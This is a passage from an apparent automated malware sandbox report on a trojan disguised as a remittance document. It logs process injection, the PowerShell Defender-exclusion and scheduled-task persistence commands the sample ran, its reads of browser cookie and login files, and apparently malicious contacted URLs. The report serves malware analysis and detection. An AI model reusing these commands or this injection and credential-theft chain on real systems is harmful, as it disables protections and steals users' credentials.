            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtOpenSection: Direct from: 0x76EF2E0C
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtQueryValueKey: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtTerminateThread: Direct from: 0x76EF2FCC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtProtectVirtualMemory: Direct from: 0x76EE7B2E
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtReadFile: Direct from: 0x76EF2ADC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtResumeThread: Direct from: 0x76EF2FBC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtCreateUserProcess: Direct from: 0x76EF371C
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtOpenKeyEx: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtWriteVirtualMemory: Direct from: 0x76EF490C
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtSetInformationThread: Direct from: 0x76EE63F9
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe Memory written: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe Memory written: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe Section loaded: NULL target: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe Section loaded: NULL target: C:\Windows\SysWOW64\winver.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Section loaded: NULL target: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe protection: read write
            Source: C:\Windows\SysWOW64\winver.exe Section loaded: NULL target: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\winver.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe Thread register set: target process: 8052
            Source: C:\Windows\SysWOW64\winver.exe Thread APC queued: target process: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe"
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GRogNEHvcL.exe"
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp16FF.tmp"
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe Process created: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe"
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp30FF.tmp"
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe Process created: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe "C:\Users\user\AppData\Roaming\GRogNEHvcL.exe"
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe Process created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"
            Source: C:\Windows\SysWOW64\winver.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000000.2259762911.00000000010C1000.00000002.00000001.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000002.4494787567.00000000010C1000.00000002.00000001.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000000.2404245123.0000000001AF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
            Source: vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000000.2259762911.00000000010C1000.00000002.00000001.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000002.4494787567.00000000010C1000.00000002.00000001.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000000.2404245123.0000000001AF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000000.2259762911.00000000010C1000.00000002.00000001.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000002.4494787567.00000000010C1000.00000002.00000001.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000000.2404245123.0000000001AF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000000.2259762911.00000000010C1000.00000002.00000001.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000002.4494787567.00000000010C1000.00000002.00000001.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000000.2404245123.0000000001AF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeQueries volume information: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            Source: Yara match, File source: 9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000009.00000002.2334768976.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000011.00000002.4495210628.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000012.00000002.4497473931.0000000005920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000011.00000002.4495268104.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000011.00000002.4493681409.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.2334955851.0000000001C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000010.00000002.4495209551.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\winver.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\winver.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\winver.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\winver.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\winver.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\winver.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\winver.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\winver.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\winver.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match, File source: 9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000009.00000002.2334768976.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000011.00000002.4495210628.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000012.00000002.4497473931.0000000005920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000011.00000002.4495268104.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000011.00000002.4493681409.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.2334955851.0000000001C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000010.00000002.4495209551.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
            |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
            | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
            | Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
            | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
            | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
            | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
            | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
            | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
            | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
            | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |

            Behavior Graph (figure). ID: 1447924, Sample: 4TH HIRE SOA REMITTANCE_USD..., Startdate: 27/05/2024, Architecture: WINDOWS, Score: 100

            | Source | Detection | Scanner | Label | Link |
            |---|---|---|---|---|
            | 4TH HIRE SOA REMITTANCE_USD280,000.exe | 42% | ReversingLabs | ByteCode-MSIL.Trojan.Barys | |
            | 4TH HIRE SOA REMITTANCE_USD280,000.exe | 55% | Virustotal | | Browse |
            | 4TH HIRE SOA REMITTANCE_USD280,000.exe | 100% | Joe Sandbox ML | | |

            | Source | Detection | Scanner | Label | Link |
            |---|---|---|---|---|
            | C:\Users\user\AppData\Roaming\GRogNEHvcL.exe | 100% | Joe Sandbox ML | | |
            | C:\Users\user\AppData\Roaming\GRogNEHvcL.exe | 42% | ReversingLabs | ByteCode-MSIL.Trojan.Barys | |

            No Antivirus matches
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.newmediamonday.com/f1h2/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.botcsllc.com/wouf/?4b34ht=XRItmHXywGWVnqDngINAMvff3IpqjclEV1ySHuRZOTcLzBiyF5+l3MoobodW+p084j4Tu28tOugkX2LbOW2aRLZQ/Vv/K47AM9XykbCYypLB0HUyScM9sRvicmb0LC0c/g==&UxF=2Nflznk0WJ3hjvtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.pilatovparts.ru/k2o4/?4b34ht=qS1OWRHNQ56Cw7+fPD172OEEUbCPY94RPpebPz6xreoqxXbgy7Cu/Z+GqTqWS2Pyzkow4Xyx1yLx23Wbx34O9asPPjW4w1AqTiokyKtl/e0W2Htu8J9pM1VOgBMsot7LIg==&UxF=2Nflznk0WJ3hjvtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.duhocvietanh.edu.vn/iqzp/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabwinver.exe, 00000011.00000003.2517734762.00000000080D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://duckduckgo.com/ac/?q=winver.exe, 00000011.00000003.2517734762.00000000080D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://ogp.me/ns#winver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://www.instagram.com/hover_domainswinver.exe, 00000011.00000002.4497860511.0000000007D40000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495925403.0000000005BE8000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003BF8000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/client/js.polyfill/container-query-polyfill.modern.jswinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/files/2v/2v4/2v414g.css?ph=8290e35a9bwinver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://d1di2lzuh97fh2.cloudfront.net/client/img/favicons/sb-favicon.ico?ph=8290e35a9bvFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://events.webnode.com/projects/-/events/winver.exe, 00000011.00000002.4495925403.00000000063C2000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000043D2000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=winver.exe, 00000011.00000003.2517734762.00000000080D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.tranivel.comvFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4497473931.000000000597A000.00000040.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)winver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.reg.ru/support/#requestwinver.exe, 00000011.00000002.4495925403.0000000005D7A000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000003D8A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://newmediamonday.comwinver.exe, 00000011.00000002.4495925403.0000000006878000.00000004.10000000.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000004888000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • 1%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.google.comwinver.exe, 00000011.00000002.4495925403.00000000058C4000.00000004.10000000.00040000.00000000.sdmp, winver.exe, 00000011.00000002.4495925403.00000000066E6000.00000004.10000000.00040000.00000000.sdmp, winver.exe, 00000011.00000002.4495925403.0000000006554000.00000004.10000000.00040000.00000000.sdmp, winver.exe, 00000011.00000002.4497860511.0000000007D40000.00000004.00000800.00020000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000046F6000.00000004.00000001.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.0000000004564000.00000004.00000001.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4495356159.00000000038D4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2622894066.000000000CE64000.00000004.80000000.00040000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
